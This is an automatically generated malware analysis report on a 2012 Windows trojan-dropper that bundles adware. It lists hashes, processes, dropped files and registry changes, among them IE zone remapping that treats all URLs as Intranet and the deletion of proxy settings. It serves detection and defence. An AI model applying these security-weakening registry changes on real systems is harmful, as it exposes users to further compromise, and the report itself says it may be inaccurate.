Trojan-Dropper.Win32.Agent.bjapvx (Kaspersky), Gen:Variant.Adware.MPlug.51 (B) (Emsisoft), Gen:Variant.Adware.MPlug.51 (AdAware), Backdoor.Win32.PcClient.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Backdoor, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 52eea08e054915129f2638d8012a38f6
SHA1: 2f798b0d3b656556e4d8932e7d0e2251ae541429
SHA256: 1c12146ea5115bb93a53344ebbdbe69ef42eff99e6e97c7eb39f29786d1c122a
SSDeep: 6144:HOMWpa2kA0PIfIyF7D1eUuKg6EizR3iT7:HloX8IfIW1eUh9ESsP
Size: 234496 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-10-25 08:28:59
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Dropper. A Trojan program intended for stealthy installation of other malware on the user's system.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:1304
%original file name%.exe:996
%original file name%.exe:592
%original file name%.exe:1936
%original file name%.exe:440
NybbleCrawler.xyz.exe:356
rundll32.exe:1256
regsvr32.exe:2008
regsvr32.exe:1784
hpds_setup.exe:164
The Trojan injects its code into the following process(es):
rundll32.exe:1016
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:1304 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_1.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_4.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_2.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_3.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_1.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\8[1].txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\images\progressbar.gif (15 bytes)
%WinDir%\Tasks\Bidaily Synchronize Task[973b].job (450 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\6_2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_2.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_5.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\6_1_3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\7_3_1[1].txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_1_1.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\%original file name%.exe (8816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\4_3[1].txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\7_1_1[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_3_1.ini.tmp (6 bytes)
%Documents and Settings%\%current user%\Desktop\52eea08e054915129f2638d8012a38f6.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\3.ini.txt (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\6_1_2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_2.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\7_1[1].txt (392 bytes)
%Documents and Settings%\All Users\Application Data\{76f98d01-d66f-efbc-76f9-98d01d663407}\%original file name%.exe (8816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\bg.ca.part (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_2.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\7_2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7_3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(2).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\3.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7.ini.txt (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\6_1_4[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\5.ini.tmp (14 bytes)
%Documents and Settings%\All Users\Application Data\{76f98d01-d66f-efbc-76f9-98d01d663407}\52eea08e054915129f2638d8012a38f6.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\6[1].txt (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\6_1[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\7_5[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_3.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_2_1.ini.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6.ini.tmp (1184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(4).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.the-invention[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\4_1[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_3.ini.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\8.ini.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\5[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\4[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\NybbleCrawler.xyz.exe (27635 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(3).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\4_2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\6_2_1[1].txt (4 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_1_4.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_1_3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_3_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_2.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_1.ini (0 bytes)
%Documents and Settings%\%current user%\Desktop\52eea08e054915129f2638d8012a38f6.lnk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_2.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_1_2.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\5.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\8.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\4_3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_5.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\4.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_2_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\4_2.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\4_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_1_1.ini (0 bytes)
The process %original file name%.exe:996 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\6D10\images\loader.gif (2 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.dll (6693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\820cb716dd7864a479458114e3582eab.ini (514 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.tlb (13 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.dat (42 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.exe (3572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\dB1XJloRgbF4Qw[1].ca (133377 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6D10\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3b805d70\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2ea510b5\temp.ca.part (119356 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\3b805d70\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2ea510b5 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2ea510b5\temp.ca (0 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3b805d70 (0 bytes)
The process %original file name%.exe:592 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\r1.the-invention[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5E80\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\290e9ce2\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\g7CyPVZagCsRV8[1].ca (134158 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.tlb (13 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.exe (3572 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dll (6693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5E80\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0284a4af\temp.ca.part (153797 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dat (44 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\e605d3cdf72e06d079458114e3582eab.ini (512 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\290e9ce2\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0284a4af\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\290e9ce2 (0 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0284a4af (0 bytes)
The process %original file name%.exe:1936 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\DAE0\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DAE0\images\loader.gif (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\9b4263a9124509d379458114e3582eab.ini (297 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (2 bytes)
%Program Files%\CutaThePrice\CutaThePrice.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0903733f\temp.ca.part (24208 bytes)
%Program Files%\CutaThePrice\CutaThePrice.exe (3572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1829a50e\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\hVwDePRrG2aSqC[1].ca (35544 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\0903733f (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1829a50e\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0903733f\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1829a50e (0 bytes)
The process %original file name%.exe:440 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\fyBYRfMAYKA66R[1].ca (33816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2e71167f\temp.ca.part (6 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\bab831a24b139eab79458114e3582eab.ini (328 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\r1.the-invention[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FF0\images\loader.gif (2 bytes)
%Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.exe (3572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1993275e\temp.ca.part (29136 bytes)
%Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FF0\images\progressbar.gif (15 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\1993275e (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2e71167f\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2e71167f (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1993275e\temp.ca (0 bytes)
The process NybbleCrawler.xyz.exe:356 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\TerminusKeeper\TerminusKeeper.dll (189078 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf071a6d8c.dll (20506 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\tf071a6d8c.dll (0 bytes)
Registry activity
The process %original file name%.exe:1304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\FLAGS]
"(Default)" = "0"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\HELPDIR]
"(Default)" = "c:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0]
"(Default)" = "JSIELib"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\79458114e3582eab]
"(Default)" = "inFHyxdfrqw4GcBCDWIpJp8qt5Hd57Gs5m8wkosDKDXTr426U5La6BI6Dq7kK2DlONq2NazNPHYy9pelh2ZT"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "c:\%original file name%.exe"
[HKLM\SOFTWARE\alpha_installer]
"rc" = "1"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}]
"(Default)" = "ITinyJSObject"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\alpha_installer]
"fi" = "0"
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"GlobalMaxTcpWindowSize" = "16777215"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\alpha_installer]
"du" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\alpha_installer]
"cr" = "13080200161088"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "c:\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 EB 36 33 B2 53 8D 6A DF 46 E6 1E 29 46 1D 87"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"(Default)" = "{157B1AA6-3E5C-404A-9118-C1D91F537040}"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "c:\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"
[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"
The Trojan modifies IE security zone settings to map all local web nodes with no dots that do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"UninstallString" = "%Program Files%\bestadblocker\tEp7pMPAVoxXWr.exe /s /n /i:ExecuteCommands;UninstallCommands"
"NoModify" = "1"
"NoRepair" = "1"
"ProductName" = "bestadblocker"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"DisplayName" = "bestadblocker"
"DisplayIcon" = "%System%\msiexec.exe"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6" = "1"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
